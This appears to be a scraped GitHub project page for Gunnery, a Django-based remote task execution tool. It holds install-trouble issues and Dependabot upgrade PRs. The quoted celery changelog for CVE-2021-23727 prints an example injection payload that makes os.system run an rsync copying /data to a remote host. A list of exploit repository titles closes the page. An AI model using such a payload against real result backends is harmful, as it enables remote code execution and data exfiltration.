Remote task execution tool

Overview

Gunnery

Build Status

Gunnery is a multipurpose task execution tool for distributed systems with web-based interface.

If your application is divided into multiple servers, you are probably connecting to them via ssh and executing over and over the same commands. Clearing caches, restarting services, backups, checking health. Wouldn't it be cool if you could do that from browser or smartphone? Gunnery is here for you!

Features

  • Support for a wide variety of tools
    Thanks to simple design it's possible to integrate with tools like capistrano, ant, phing, fabric, make, or puppet
  • Designed for distributed systems
    Handles multi-environment applications with many servers
  • Usable for deployment, service control, backups
    Every command executed in shell can be turned into a Gunnery task
  • Secure remote execution
    Certificate based authentication provides secure access to your network
  • Web-based interface
    Clear, responsive interface pleases eye and enables usage on mobile devices
  • User notifications
    Team members will be notified when tasks are executed
  • Permission system
    Create custom user groups and limit their access to specific environments or tasks

Screenshots

test test test

Documentation

Step by step install instructions, and usage notes are available in documentation.

Feedback

Please submit feedback, bugs, feature requests here.

Contribute

Vagrant configuration is available for easy development, included Puppet rules will build complete environment. Read more

Comments
  • Getting started

    Getting started

    I would really like to test this as it seems a useful app but following the steps (either shortcut or longer installation) both leave me at the same spot with seemingly not reading the settings properly. It complains about SECRET_KEY being empty and DATABASE/ENGINE settings etc. so seems to be reading from /var/gunnery/virtualenv/production/local/lib/python2.7/site-packages/django/conf/ when I believe it should read from /var/gunnery/gunnery/gunnery/settings?

    Basically, following the steps always fails at the "python manage.py syncdb" step.

    The instructions I personally find really poor, unless this is only meant for people who have a deep understanding of all the various apps used for it to work? In a previous issue about poor documentation one reply is "For now, I recommend looking at puppet rules, they will get you running application in minutes.". I don't think anyone could get a running app in minutes on this, especially without knowing puppet really well also.

    For now I have to give up as I have spent almost a whole day on this which is a shame, but until following the instructions works, I cannot spend more time on it. I hope you can tell me something really obvious I am doing wrong but if I am, it is not in the docs.

    opened by jmilburn 16
  • Submodule 'puppet-module-python.git'

    Submodule 'puppet-module-python.git'

    Hi, I am getting this error while cloning the repo "fatal: repository 'https://github.com/puppetmodules/puppet-module-python.git/' not found Clone of 'https://github.com/puppetmodules/puppet-module-python.git' into submodule path 'puppet/modules/python' failed"

    Turns out https://github.com/puppetmodules/puppet-module-python has been deleted or made private, is there an alternative to above module?

    bug 
    opened by agaurav 7
  • Clicking on + for

    Clicking on + for "add server" causes Django to silently hang

    Clicking on plus sign causes this request to spawn and never finish: http://10.211.55.7:8080/modal_form/a:/environment/1/server/ It halts whole UWSGI process, no requests can be made, until UWSGI is killed (SIGTERM does nothing). All requests timeout with 504.

    Nothing new appears in logs when this happens. Not even nginx request.

    I've tried this in development environment, i.e. by running python manage.py runserver and issuing curl request, which causes it to hang too and Python must be killed. Note that by using curl I'm not even logged in. The request doesn't even shop up on the screen.

    root@vmdebian7:/var/gunnery/gunnery# python manage.py runserver
    Validating models...
    
    0 errors found
    June 10, 2014 - 12:43:11
    Django version 1.6.2, using settings 'gunnery.settings.production'
    Starting development server at http://127.0.0.1:8000/
    Quit the server with CONTROL-C.
    [10/Jun/2014 12:43:16] "HEAD / HTTP/1.1" 302 0
    

    Second terminal window:

    root@vmdebian7:/var/gunnery/log# curl localhost:8000/ -I
    HTTP/1.0 302 FOUND
    Date: Tue, 10 Jun 2014 10:43:16 GMT
    Server: WSGIServer/0.1 Python/2.7.3
    Vary: Cookie
    X-Frame-Options: SAMEORIGIN
    Content-Type: text/html; charset=utf-8
    Location: http://localhost:8000/account/login/?next=/
    
    root@vmdebian7:/var/gunnery/log# curl localhost:8000/modal_form/a:/environment/1/server/ -I
    # hangs....
    

    It is a clear installation. I just created Department, Server roles, Application, Environment and clicking on + in chosen Environment causes this.

    I'm not really familiar with Django or Python, is there something I can do to nail down this issue?

    Also, I don't know if it can be related - issuing service celeryd stop does nothing, it waits. I must ctrl+c the stopping process and issue it again. Workers stop properly on this second try. Always. Doesn't matter if I have one worker or 3 of them. I don't know if clicking on Add server causes some background task to fire... so that's why I'm mentioning this.

    root@vmdebian7:/var/gunnery/log# /etc/init.d/celeryd start
    celery multi v3.1.7 (Cipater)
    > Starting nodes...
            > worker1@vmdebian7: OK
    root@vmdebian7:/var/gunnery/log# /etc/init.d/celeryd stop
    celery multi v3.1.7 (Cipater)
    > Stopping nodes...
            > worker1@vmdebian7: TERM -> 5685
    > Waiting for 1 node -> 5685....................................................................................^C
    Session terminated, terminating shell... ...terminated.
    
    root@vmdebian7:/var/gunnery/log# /etc/init.d/celeryd stop
    celery multi v3.1.7 (Cipater)
    > Stopping nodes...
            > worker1@vmdebian7: TERM -> 5685
    > Waiting for 1 node -> 5685.....
            > worker1@vmdebian7: OK
    

    VM: Debian 3.2.0-4-amd64 Python 2.7.3 (default, Mar 13 2014, 11:03:55) Erlang R15B01 (erts-5.9.1) [source] [64-bit] [async-threads:30] [kernel-poll:true] RabbitMQ 2.8.4

    If you need anything more, let me know.

    bug 
    opened by daliborfilus 7
  • Better documentation

    Better documentation

    I'd really like to see some better documentation about setting this up and getting it running. If you're not familiar with the db layout, or any python apps, it's a real nightmare navigating how to install it.

    documentation 
    opened by jaxxstorm 4
  • static files not found

    static files not found

    Hello,

    I am following http://gunnery.readthedocs.org/en/latest/install.html documentation to get server up and running. I am able to get it running.

    But, css, jquery, bootstrap files are not found http://localhost:8000/static/css/bootstrap.css Also, nothing happens if I click on "Create first".

    what could be the reason / what do i need to change ?

    thanks, Manjiri

    opened by manjirinamjoshi 3
  • Please sync your develop branch with your master

    Please sync your develop branch with your master

    I'd like to contribute but your develop branch is out of sync with master. In docs you say we need to create branch from develop but it's old. Please @Eyjafjallajokull update develop so I can add some PR's .:D

    opened by senkal 2
  • Relation

    Relation "django_content_type" does not exist

    When I spin up the VM and go to the localhost I am immediately greeted with this error

    relation "django_content_type" does not exist
    LINE 1: ..."."app_label", "django_content_type"."model" FROM "django_co...
    
    Environment:
    
    
    Request Method: GET
    Request URL: http://localhost:8080/account/login/?next=/
    
    Django Version: 1.6.7
    Python Version: 2.7.6
    Installed Applications:
    ('django.contrib.auth',
     'django.contrib.contenttypes',
     'django.contrib.sessions',
     'django.contrib.messages',
     'django.contrib.staticfiles',
     'django.contrib.humanize',
     'django_extensions',
     'timezone_field',
     'guardian',
     'crispy_forms',
     'djcelery',
     'south',
     'core',
     'task',
     'backend',
     'account',
     'event',
     'debug_toolbar')
    Installed Middleware:
    ('django.contrib.sessions.middleware.SessionMiddleware',
     'django.middleware.common.CommonMiddleware',
     'django.middleware.csrf.CsrfViewMiddleware',
     'django.contrib.auth.middleware.AuthenticationMiddleware',
     'django.contrib.messages.middleware.MessageMiddleware',
     'django.middleware.clickjacking.XFrameOptionsMiddleware',
     'django.contrib.auth.backends.ModelBackend',
     'guardian.backends.ObjectPermissionBackend',
     'core.middleware.CurrentDepartment',
     'debug_toolbar.middleware.DebugToolbarMiddleware')
    
    
    Traceback:
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/core/handlers/base.py" in get_response
      137.                 response = response.render()
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/template/response.py" in render
      105.             self.content = self.rendered_content
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/template/response.py" in rendered_content
      81.         context = self.resolve_context(self.context_data)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/template/response.py" in resolve_context
      159.         return RequestContext(self._request, context, current_app=self._current_app)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/debug_toolbar/panels/templates/panel.py" in _request_context__init__
      55.         context = processor(request)
    File "./core/context_processors.py" in sidebar
      8.     departments = get_objects_for_user(request.user, 'core.view_department')
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/guardian/shortcuts.py" in get_objects_for_user
      354.                 permission__codename=codename)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/manager.py" in get
      151.         return self.get_queryset().get(*args, **kwargs)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/query.py" in get
      304.         num = len(clone)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/query.py" in __len__
      77.         self._fetch_all()
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/query.py" in _fetch_all
      857.             self._result_cache = list(self.iterator())
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/query.py" in iterator
      220.         for row in compiler.results_iter():
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/sql/compiler.py" in results_iter
      713.         for rows in self.execute_sql(MULTI):
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/models/sql/compiler.py" in execute_sql
      786.         cursor.execute(sql, params)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/debug_toolbar/panels/sql/tracking.py" in execute
      174.         return self._record(self.cursor.execute, sql, params)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/debug_toolbar/panels/sql/tracking.py" in _record
      104.             return method(sql, params)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/backends/util.py" in execute
      69.             return super(CursorDebugWrapper, self).execute(sql, params)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/backends/util.py" in execute
      53.                 return self.cursor.execute(sql, params)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/utils.py" in __exit__
      99.                 six.reraise(dj_exc_type, dj_exc_value, traceback)
    File "/var/gunnery/virtualenv/development/local/lib/python2.7/site-packages/django/db/backends/util.py" in execute
      53.                 return self.cursor.execute(sql, params)
    
    Exception Type: ProgrammingError at /account/login/
    Exception Value: relation "django_content_type" does not exist
    LINE 1: ..."."app_label", "django_content_type"."model" FROM "django_co...
    
                                                             ^ 
    

    Not sure exactly why this is occurring on a fresh git clone

    Thanks for the help

    question 
    opened by ddymko 2
  • Vagrant Box outdated

    Vagrant Box outdated

    I ran into the issue that when I ran vagrant up with a fresh git clone nothing would provision. I would get a ton of errors with ubuntu links that would 404 in terminal. I am assuming that the vm Box that is currently in the Vagrantfile is outdated which is causing the issues.

    I decided to change the box that I would run on to ubuntu/trusty64 and everything seems to be fine. Would updating the box to a newer version of ubuntu be something considered to help fix the vagrant?

    bug 
    opened by ddymko 2
  • Setup guidelines create init.d for uwsgi with incorrect path to gunnery.ini

    Setup guidelines create init.d for uwsgi with incorrect path to gunnery.ini

    The setup directions at http://gunnery.readthedocs.org/en/latest/install.html write gunnery.ini to /etc/uwsgi/apps-enabled but the init.d script for uwsgi points to sites-enabled.

    The dir needs to be renamed in the docs.

    bug documentation 
    opened by kalleth 2
  • change celery worker & concurrency settings

    change celery worker & concurrency settings

    We have 80 machines that need to execute the command in a task.

    And we found out that there only 8 concurrency worker will run in a same time.

    I know celery is the key of gunnery task and I found some config in puppet file https://github.com/gunnery/gunnery/blob/master/puppet/manifests/hieradata/common.yaml

    celery::workers : 1 celery::concurrency : 8

    We are trying to increase those number after already installed. Any hint will be great. Thanks.

    question 
    opened by chrisLeeTW 2
  • Add Create Own SSH Certificate Feature.

    Add Create Own SSH Certificate Feature.

    Thanks for this great solution.

    Due to our org system security policy. Our org need to regenerate all these ssh certificate after one month.

    So If there can add our own ssh cert that will be great.

    Hope that can consider this advice. thanks.

    opened by chrisLeeTW 2
  • Bump paramiko from 1.14.0 to 2.10.1 in /requirements

    Bump paramiko from 1.14.0 to 2.10.1 in /requirements

    Bumps paramiko from 1.14.0 to 2.10.1.

    Commits
    • 286bd9f Cut 2.10.1
    • 4c491e2 Fix CVE re: PKey.write_private_key chmod race
    • aa3cc6f Cut 2.10.0
    • e50e19f Fix up changelog entry with real links
    • 02ad67e Helps to actually leverage your mocked system calls
    • 29d7bf4 Clearly our agent stuff is not fully tested yet...
    • 5fcb8da OpenSSH docs state %C should also work in IdentityFile and Match exec
    • 1bf3dce Changelog enhancement
    • f6342fc Prettify, add %C as acceptable controlpath token, mock gethostname
    • 3f3451f Add to changelog
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • Bump celery from 3.1.7 to 5.2.2 in /requirements

    Bump celery from 3.1.7 to 5.2.2 in /requirements

    Bumps celery from 3.1.7 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • Bump django from 1.6.7 to 2.2.24 in /requirements

    Bump django from 1.6.7 to 2.2.24 in /requirements

    Bumps django from 1.6.7 to 2.2.24.

    Commits
    • 2da029d [2.2.x] Bumped version for 2.2.24 release.
    • f27c38a [2.2.x] Fixed CVE-2021-33571 -- Prevented leading zeros in IPv4 addresses.
    • 053cc95 [2.2.x] Fixed CVE-2021-33203 -- Fixed potential path-traversal via admindocs'...
    • 6229d87 [2.2.x] Confirmed release date for Django 2.2.24.
    • f163ad5 [2.2.x] Added stub release notes and date for Django 2.2.24.
    • bed1755 [2.2.x] Changed IRC references to Libera.Chat.
    • 63f0d7a [2.2.x] Refs #32718 -- Fixed file_storage.test_generate_filename and model_fi...
    • 5fe4970 [2.2.x] Post-release version bump.
    • 61f814f [2.2.x] Bumped version for 2.2.23 release.
    • b8ecb06 [2.2.x] Fixed #32718 -- Relaxed file name validation in FileField.
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • Bump django-debug-toolbar from 1.2.1 to 1.11.1 in /requirements

    Bump django-debug-toolbar from 1.2.1 to 1.11.1 in /requirements

    Bumps django-debug-toolbar from 1.2.1 to 1.11.1.

    Changelog

    Sourced from django-debug-toolbar's changelog.

    1.11.1 (2021-04-14)

    • Fixed SQL Injection vulnerability, CVE-2021-30459. The toolbar now calculates a signature on all fields for the SQL select, explain, and analyze forms.

    1.11 (2018-12-03)

    • Use defer on all <script> tags to avoid blocking HTML parsing, removed inline JavaScript.
    • Stop inlining images in CSS to avoid Content Security Policy errors altogether.
    • Reformatted the code using black <https://github.com/ambv/black>__.
    • Added the Django mail panel to the list of third-party panels.
    • Convert system check errors to warnings to accomodate exotic configurations.
    • Fixed a crash when explaining raw querysets.
    • Fixed an obscure unicode error with binary data fields.
    • Added MariaDB and Python 3.7 builds to the CI.

    1.10.1 (2018-09-11)

    • Fixed a problem where the duplicate query detection breaks for non-hashable query parameters.
    • Added support for structured types when recording SQL.
    • Made Travis CI also run one test no PostgreSQL.
    • Added fallbacks for inline images in CSS.
    • Improved cross-browser compatibility around URLSearchParams usage.
    • Fixed a few typos and redundancies in the documentation, removed mentions of django-debug-toolbar's jQuery which aren't accurate anymore.

    1.10 (2018-09-06)

    • Removed support for Django < 1.11.
    • Added support and testing for Django 2.1 and Python 3.7. No actual code changes were required.
    • Removed the jQuery dependency. This means that django-debug-toolbar now requires modern browsers with support for fetch, classList etc.
    • Added support for the server timing header.
    • Added a differentiation between similar and duplicate queries. Similar queries are what duplicate queries used to be (same SQL, different parameters).
    • Stopped hiding frames from Django's contrib apps in stacktraces by default.

    ... (truncated)

    Commits
    • bc08f69 Merge pull request from GHSA-pghf-347x-c2gj
    • c201ce3 django-debug-toolbar 1.11
    • 0a75be1 Update the change log
    • a4a5393 Merge pull request #1121 from matthiask/mariadb
    • 48a0e2e Reformat settings using black
    • 901aed7 Mark binary payload as binary (same thing BinaryField.get_db_prep_value does)
    • ad091e6 Test with a real BinaryField
    • 2f3193e Remove the MySQL USER
    • 762e5d9 Run tests with MariaDB too on Travis CI
    • e78ac8c Merge pull request #1107 from dbowd/patch-1
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • Bump ecdsa from 0.11 to 0.13.3 in /requirements

    Bump ecdsa from 0.11 to 0.13.3 in /requirements

    Bumps ecdsa from 0.11 to 0.13.3.

    Release notes

    Sourced from ecdsa's releases.

    ecdsa 0.13.3

    Fix CVE-2019-14853 - possible DoS caused by malformed signature decoding Fix CVE-2019-14859 - signature malleability caused by insufficient checks of DER encoding

    Also harden key decoding from string and DER encodings.

    ecdsa 0.13.2

    Restore compatibility of setup.py with Python 2.6 and 2.7.

    ecdsa 0.13.1

    Fix the PyPI wheel - the old version included .pyc files.

    ecdsa 0.13

    Fix the argument order for Curve constructor (put openssl_name= at the end,
    with a default value) to unbreak compatibility with external callers who used
    the 0.11 convention.

    ecdsa 0.12

    Switch to Versioneer for version-string management (fixing the broken ecdsa.__version__ attribute). Add Curve.openssl_name property. Mention secp256k1 in README, test against OpenSSL. Produce "wheel" distributions. Add py3.4 and pypy3 compatibility testing. Other minor fixes.

    Changelog

    Sourced from ecdsa's changelog.

    • Release 0.14.1 (06 Nov 2019)

    Remove the obsolete six.py file from wheel

    • Release 0.14 (06 Nov 2019)

    Bug fixes: Strict checking of DER requirements when parsing SEQUENCE, INTEGER, OBJECT IDENTIFIER and BITSTRING objects. DER parsers now consistently raise UnexpectedDER exception on malformed DER encoded byte strings. Make sure that both malformed and invalid signatures raise BadSignatureError. Ensure that all SigningKey and VerifyingKey methods that should accept bytes-like objects actually do accept them (also avoid copying input strings). Make SigningKey.sign_digest_deterministic use default object hashfunc when none was provided. encode_integer now works for large integers. Make encode_oid and remove_object correctly handle OBJECT IDENTIFIERs with large second subidentifier and padding in encoded subidentifiers.

    New features: Deterministic signature methods now accept extra_entropy parameter to further randomise the selection of k (the nonce) for signature, as specified in RFC6979. Recovery of public key from signature is now supported. Support for SEC1/X9.62 formatted keys, all three encodings are supported: "uncompressed", "compressed" and "hybrid". Both string, and PEM/DER will automatically accept them, if the size of the key matches the curve. Benchmarking application now provides performance numbers that are easier to compare against OpenSSL. Support for all Brainpool curves (non-twisted).

    New API: CurveFp: __str__ is now supported. SigningKey.sign_deterministic, SigningKey.sign_digest_deterministic and generate_k: extra_entropy parameter was added Signature.recover_public_keys was added VerifyingKey.from_public_key_recovery and VerifyingKey.from_public_key_recovery_with_digest were added VerifyingKey.to_string: encoding parameter was added VerifyingKey.to_der and SigningKey.to_der: point_encoding parameter was added. encode_bitstring: unused parameter was added remove_bitstring: expect_unused parameter was added SECP256k1 is now part of curves * import Curves: __repr__ is now supported VerifyingKey: __repr__ is now supported

    Deprecations: Python 2.5 is not supported any more - dead code removal.

    ... (truncated)
    Commits
    • 7add221 update NEWS file for 0.13.3
    • 5c4c74a Merge pull request #124 from tomato42/backport-sig-decode
    • 1eb2c04 update README with error handling of from_string() and from_der()
    • b95be03 execute also new tests in Travis
    • 99c907d harden also key decoding
    • 3427fa2 ensure that the encoding is actually the minimal one for length and integer
    • 563d2ee make variable names in remove_integer more aproppriate
    • 14abfe0 explicitly specify the distro to get py26 and py33
    • 9080d1d fix length decoding
    • 897178c give the same handling to string encoded signatures as to DER
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot ignore this [patch|minor|major] version will close this PR and stop Dependabot creating any more for this minor/major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
Releases(v0.2-alpha)
  • v0.2-alpha(Sep 17, 2014)

    • Extend permission system by adding user groups
    • Code refactoring of modal windows
    • Improved test coverage to 69%
    • Bugfixes: sidebar, modal windows, user lists

    Upgrading

    After updating code to this version run python manage.py migrate --merge in application directory to update database schema. Migrations will add 2 default groups to every department and assign all users to User groups. It is necessary to manually assign Admin group to selected users, because this information is not migrated from v0.1.

    Source code(tar.gz)
    Source code(zip)
  • v0.1-alpha(Aug 18, 2014)

    This is first release of Gunney project, features:

    • organize applications and users in departments
    • manage many servers using roles
    • execute remote commands via SSH
    Source code(tar.gz)
    Source code(zip)
Aiorq is a distributed task queue with asyncio and redis

Aiorq is a distributed task queue with asyncio and redis, which rewrite from arq to make improvement and include web interface.

PY-GZKY 5 Mar 18, 2022
Clepsydra is a mini framework for task scheduling

Intro Clepsydra is a mini framework for task scheduling All parts are designed to be replaceable. Main ideas are: No pickle! Tasks are stored in reada

Andrey Tikhonov 15 Nov 4, 2022
A simple scheduler tool that provides desktop notifications about classes and opens their meet links in the browser automatically at the start of the class.

This application provides desktop notifications about classes and opens their meet links in browser automatically at the start of the class.

Anshit 14 Jun 29, 2022
Simple, Pythonic remote execution and deployment.

Welcome to Fabric! Fabric is a high level Python (2.7, 3.4+) library designed to execute shell commands remotely over SSH, yielding useful Python obje

Fabric 13.8k Jan 6, 2023
Gitlab RCE - Remote Code Execution

Gitlab RCE - Remote Code Execution RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f

null 153 Nov 9, 2022
Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

Enox 47 Nov 9, 2022
Remote execution of a simple function on the server

FunFetch Remote execution of a simple function on the server All types of Python support objects.

Decave 4 Jun 30, 2022
Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

Dasith Vidanage 7 Mar 8, 2022
Übersicht remote command execution 0day exploit

